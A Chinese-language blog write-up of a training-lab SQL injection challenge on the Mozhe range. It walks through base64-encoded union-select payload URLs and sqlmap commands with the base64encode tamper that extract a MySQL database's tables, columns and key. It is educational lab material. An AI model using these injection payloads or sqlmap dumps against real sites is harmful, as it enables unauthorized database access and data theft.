WEB安全-SQL注入实战-MySQL


前言 这是SQL注入的第十二篇,初级的SQL注入差不多已经打完了,非mysql的数据库我因为没有学过暂时没有去尝试,其它的等以后有机会再搞,可能最近的靶场会打的少一些,因为课好像很多没听,要补一补了…… 链接如下:https://www.mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe 正文 手工注入 首先明确目标 打开目标网页,如下所示 判断类型时,发现id后面的数据根据题目提示,应该是base64加密,解密后就是1,所以之后的数据处理时先base64加密后再输入 进行尝试时判断出是数字型,所以后面就容易多了 219.153.49.228:40385/show.php?id=LTEgb3IgMT0x 获得列数为2,判断回显位为1和2 http://219.153.49.228:40385/show.php?id=MSBvcmRlciBieSAy http://219.153.49.228:40385/show.php?id=LTEgdW5pb24gc2VsZWN0IDEsMg== 爆出数据库名为 test http://219.153.49.228:40385/show.php?id=LTEgdW5pb24gc2VsZWN0IGRhdGFiYXNlKCksMg== 爆出表名为 data http://219.153.49.228:40385/show.php?id=LTEgdW5pb24gc2VsZWN0IGRhdGFiYXNlKCksZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKQ== 爆出列为  id,title,main,thekey http://219.153.49.228:40385/show.php?id=LTEgdW5pb24gc2VsZWN0IGRhdGFiYXNlKCksZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J2RhdGEn 爆出thekey表中的数据,获得key http://219.153.49.228:40385/show.php?id=LTEgdW5pb24gc2VsZWN0IGRhdGFiYXNlKCksZ3JvdXBfY29uY2F0KHRoZWtleSkgZnJvbSB0ZXN0LmRhdGE= 关于sqlmap的tamper使用 写完后再次看到实训目标,对于tamper插件产生了兴趣,去了解了一下,原来是sqlmap自带的插件,方便我们去注入,具体可以看灼剑(Tsojan)安全团队的博客,写的很详细,链接如下:https://blog.csdn.net/weixin_42282189/article/details/121450011,注意博客中是.py的后缀,是在windows环境里运行的,在kali里面直接--tamper+插件名就可以使用 以本题为例进行使用,看看效果,首先前面的代码和sqlmap一样,但是由于本体是base64加密的,所以在后面模块名为base64encode,得出数据库 sqlmap -u http://219.153.49.228:40385/show.php?id=MQo= --current-db --batch --threads 10 --level 5 --tamper base64encode 爆出数据表,可能是多了一个base64加密,且不是布尔、时间盲注和报错注入的一种,没法规定模式,可能比较慢 sqlmap -u http://219.153.49.228:40385/show.php?id=MQo= -D test --tables  --batch --threads 10 --level 5 --tamper base64encode 爆出列名 sqlmap -u http://219.153.49.228:40385/show.php?id=MQo= -D test -T data --columns --batch --threads 10 --level 5 --tamper base64encode 获取thekey列的数据,获取key sqlmap -u http://219.153.49.228:40385/show.php?id=MQo= -D test -T data -C thekey --dump --threads 10 --level 5 --tamper base64encode 总结 这个靶场其实并不是很难,基本上有思路就是流程化作业,大家可以尝试一下,顺便了解一下tamper插件的使用